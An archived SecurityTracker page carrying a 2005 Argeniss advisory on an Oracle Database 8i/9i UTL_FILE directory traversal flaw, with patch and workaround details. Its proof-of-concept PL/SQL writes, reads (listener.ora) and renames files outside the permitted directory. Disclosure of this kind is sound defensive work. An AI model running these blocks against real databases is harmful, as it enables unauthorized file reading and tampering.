SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Database)  >   Oracle Database Vendors:   Oracle
Oracle Database Server UTL_FILE Error Discloses Files to Remote Authenticated Users
SecurityTracker Alert ID:  1013392
SecurityTracker URL:  http://securitytracker.com/id/1013392
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 7 2005
Impact:   Disclosure of system information, Disclosure of user information, Modification of system information, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 8i, 9i
Description:   An input validation vulnerability was reported in Oracle Database Server in the UTL_FILE package. A remote authenticated user can access arbitrary files on the target system.

The software does not properly validate user-supplied input in some Directory Object functions. A remote authenticated user can exploit a flaw in UTL_FILE by supplying directory traversal characters to some Directory Object functions to gain read or write access to files on the target system that are located outside of the intended directory.

The MEDIA_DIR function is affected. Other functions may also be affected.

The vendor was notified in October 2003.

Impact:   A remote authenticated user can gain read and write access to files on the target system.
Solution:   The vendor has issued a fix (Critical Patch Update - January 2005), described at:

http://www.oracle.com/technology/deploy/security/pdf/cpu-jan-2005_advisory.pdf

Vendor URL:  www.oracle.com/technology/deploy/security/pdf/cpu-jan-2005_advisory.pdf (Links to External Site)
Cause:   Input validation error
Underlying OS:   Linux (Any), UNIX (AIX), UNIX (HP/UX), UNIX (Solaris - SunOS), UNIX (Tru64), Windows (NT), Windows (2000)

Message History:   None.


 Source Message Contents

Date:  Mon, 7 Mar 2005 14:00:37 -0800 (PST)
Subject:  [VulnWatch] - Argeniss - Oracle Database Server Directory transversal


Argeniss Security Advisory


Name: Oracle Database Server Directory transversal
Affected Software: Oracle Database Server versions 8i
and 9i
Severity :  Medium
Remote exploitable: Yes (Authentication to Database
Server is needed)
Credits:    Cesar Cerrudo
Date:    03/07/05
Advisory Number:   ARG030501


Details:

Oracle Database Server provides many packages
functions to access the OS file system, some of these
functions are not able to access files directly, for
example in order to access files a Directory Object 
must be created and grant to users permissions on the
object, this object references a directory in the 
file system and it can be used by functions to access
files under that directory only. However functions 
don't properly validate the input and by supplying a
especially constructed string the directory can be 
escaped and the parent directories can be accessed,
because of this any file in the same drive
as the directory, can be read, renamed, overwrited,
etc.


To reproduce the vulnerability execute the next
PL/SQL:
(In older Oracle database server versions the same
could work just using "\..\..\")
(This is not a extensive list of vulnerable functions,
other functions that parse files could
also be vulnerable)

--this create a file called Unbreakable.txt in the
same drive as the directory referenced by 
--MEDIA_DIR directory object.
declare
f utl_file.file_type;
begin
f:=UTL_FILE.FOPEN
('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\Unbreakable.txt','w',1000);
UTL_FILE.PUT_LINE (f,'Sure',TRUE);
UTL_FILE.FCLOSE(f);
end;

--this example can be used to read arbitrary files in
the same drive as the directory referenced by 
--MEDIA_DIR directory object.
SET SERVEROUTPUT ON
declare
f utl_file.file_type;
sBuffer Varchar(8000);
begin
f:=UTL_FILE.FOPEN
('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\OracleDir\ora90\network\ADMIN\listener.ora','r');
loop
  UTL_FILE.GET_LINE (f,sBuffer);
  DBMS_OUTPUT.PUT_LINE(sBuffer);
end loop;
EXCEPTION
when no_data_found then
UTL_FILE.FCLOSE(f);
end;

--this rename any file in the same drive as the
directory referenced by 
--MEDIA_DIR directory object
begin

UTL_FILE.frename('MEDIA_DIR','\\.\\..\\.\\..\\.\\FileToRename','MEDIA_DIR','\\.\\..\\.\\..\\.\\Unbreakable.txt',TRUE);
end;


By default UTL_FILE package has execute permission to
public role so any Oracle database 
user with permissions on a Directory Object can
exploit this vulnerability.
Explotation of this vulnerability allow an attacker to
overwrite, read, rename, etc. 
arbitrary files.


Vendor Status:

Oracle was contacted on October 2003, after an initial
email interchange i didn't have any
news about when the vulnerability was going to be
patched or when it was patched nor i was credited, 
but this is common when dealing with Oracle on
security issues.


Workaround:

Restrict access to Directory Objects and UTL_FILE
package.



Patch Available: 

http://metalink.oracle.com


Links:

http://www.argeniss.com/research/ARGENISS-ADV-030501.txt
http://www.petefinnigan.com/directory_traversal.pdf
http://www.oracle.com/technology/deploy/security/pdf/cpu-jan-2005_advisory.pdf



Important!!!!!!!!

There are still hundreds of unpatched Oracle Database
Server vulnerabilities affecting 
versions 8i, 9i and 10g some of them have been
reported more than 1 year ago.
If you want to know more about these vulnerabilities
and many others check out our 
AVI (Advanced Vulnerability Information) service at
http://www.argeniss.com/services.html




-----------------------------------
--Argeniss - Information Security--
-----http://www.argeniss.com-------
------info>at<argeniss.com---------
-----------------------------------




	
		
__________________________________ 
Celebrate Yahoo!'s 10th Birthday! 
Yahoo! Netrospective: 100 Moments of the Web 
http://birthday.yahoo.com/netrospective/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC